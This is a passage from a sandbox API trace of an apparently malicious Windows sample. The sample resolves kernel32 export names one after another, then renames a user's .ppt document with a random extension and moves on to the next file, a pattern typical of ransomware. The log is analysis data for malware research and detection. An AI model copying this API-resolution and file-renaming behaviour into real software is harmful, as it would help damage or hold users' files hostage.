lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.823] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.823] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.823] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.823] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.823] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.824] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.824] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.824] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.824] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.824] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.824] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.824] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.824] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.824] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.824] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.824] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.824] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.824] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.824] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.824] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.824] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.824] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.824] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.824] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.825] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.825] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.825] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.825] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.825] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.825] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.825] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.825] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.825] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.825] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.825] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.825] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.825] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.825] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.825] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.825] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.825] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.825] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.826] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.826] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.826] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.826] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.826] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.826] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.826] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.826] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.826] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.826] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.826] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.826] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.826] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.826] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.826] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.826] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.826] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.826] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.826] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.827] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.827] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.827] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.827] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.827] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.827] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.827] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.827] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.827] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.827] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.827] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.827] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.827] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.827] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.827] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.827] lstrlenA (lpString="DELETEATOM") returned 10 [0083.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.827] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.827] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.827] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.828] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.828] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.828] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.828] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.828] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.828] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.828] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.828] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.828] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.828] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.828] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.828] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.828] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.828] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.828] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.828] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.828] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.828] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.828] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.829] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.829] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.829] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.829] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.829] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.829] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.829] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.829] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.829] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.829] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.829] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.829] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.829] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.829] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.829] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.829] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.829] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.829] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.830] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.830] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\7xwnnge1dMI4u1n8p.ppt") returned 79 [0083.830] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\7xwnnge1dMI4u1n8p.ppt.zuFUn6S") returned 87 [0083.830] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\7xwnnge1dMI4u1n8p.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\7xwnnge1dmi4u1n8p.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\7xwnnge1dMI4u1n8p.ppt.zuFUn6S" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\7xwnnge1dmi4u1n8p.ppt.zufun6s"), dwFlags=0x0) returned 1 [0083.830] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.831] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.831] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.831] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae2624e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae2624e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae2624e0, 